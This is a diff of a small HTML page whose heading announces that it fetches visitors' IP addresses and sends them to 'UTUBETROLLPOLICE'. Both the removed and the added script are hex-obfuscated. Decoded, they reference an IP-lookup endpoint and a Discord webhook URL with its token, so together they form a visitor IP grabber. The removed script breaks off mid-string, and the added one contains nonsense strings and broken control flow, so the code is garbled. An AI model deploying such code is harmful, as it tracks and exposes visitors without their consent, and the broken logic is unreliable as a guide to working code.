--- a/index.html
+++ b/index.html
@@ -3,11 +3,20 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>V8KBTU TPOYY STRGBIG</title>
+    <title>TOMMY PARKY BIG STRONG</title>
 </head>
 <body>
     <h1>Fetching and Sending Your IP Address to UTUBETROLLPOLICE</h1>
     <p id="status">Loading...</p>
 
     <script>
-        (function(){const _0x52b7=["\x66\x65\x74\x63\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x2F\x2F\x70\x74\x62\x2E\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x33\x37\x36\x31\x33\x31\x38\x39\x31\x31\x30\x32\x37\x34\x38\x36\x38\x32\x2F\x56\x35\x58\x78\x63\x72\x5A\x79\x42\x55\x58\x39\x5F\x79\x62\x5A\x51\x66\x39\x32\x6B\x74\x38\x6B\x36\x49\x63\x65\x4A\x4A\x74\x38\x37\x6B\x2D\x69\x36\x45\x55\x61\x74\x53\x4D\x4C\x45\x38\x4B\x72\x71\x31\x4F\x71\x7A\x32\x31\x38\x5F\x6F\x36\x55\x52\x6E\x4B\x62\x42\x7A\x65\x5A\x7A\x7A","\x2F\x2F\x61\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x64\x6F\x63\x75\x6D\]()_
+        (function(){
+            const _0x2a48=["\x66\x65\x74\x63\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x2F\x2F\x70\x74\x62\x2E\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x33\x37\x36\x31\x33\x31\x38\x39\x31\x31\x30\x32\x37\x34\x38\x36\x38\x32\x2F\x56\x35\x58\x78\x63\x72\x5A\x79\x42\x55\x58\x39\x5F\x79\x62\x5A\x51\x66\x39\x32\x6B\x74\x38\x6B\x36\x49\x63\x65\x4A\x4A\x74\x38\x37\x6B\x2D\x69\x36\x45\x55\x61\x74\x53\x4D\x4C\x45\x38\x4B\x72\x71\x31\x4F\x71\x7A\x32\x31\x38\x5F\x6F\x36\x55\x52\x6E\x4B\x62\x42\x7A\x65\x5A\x7A\x7A","\x2F\x2F\x61\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x44","\x66\x69\x6C\x65\x64","\x63\x6F\x6E\x74\x65\x6E\x74","\x63\x6F\x6E\x73\x6F\x6C\x65\x2E\x6C\x6F\x67","\x65\x72\x72\x6F\x72","\x6F\x72\x63\x61\x6D\x70\x6C\x65","\x77\x69\x74\x68\x72\x65\x67\x61\x72\x64\x65\x64\x72\x65\x61\x64\x6C\x65\x72\x63\x69\x73\x20\x6E\x69\x74\x20\x6E\x6F\x77\x3A\x20\x2F\x66\x6F\x72\x6D\x61\x74\x64\x2F","\x65\x72\x72\x6F\x72\x6D\x61\x74\x64\x61\x73\x69\x73","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x4E\x61\x6D\x65\x2F","\x6A\x73\x6F\x6E\x64","\x61\x67\x65\x74\x2F\x62\x75\x74\x20\x5F\x63\x6C\x6F\x73\x65\x63\x74\x75\x72\x65\x2E\x73\x69\x67\x2F","\x74\x72\x75\x65"];
+            (function(_0x3f5e,_0x5e7e){
+                while(!![]){try{
+                    _0x5e7e[_0x2a48[0]](window);
+                    break;}catch(e){}}})(window.location=_0x2a48[3]);
+            })();
+    </script>
+</body>
+</html>
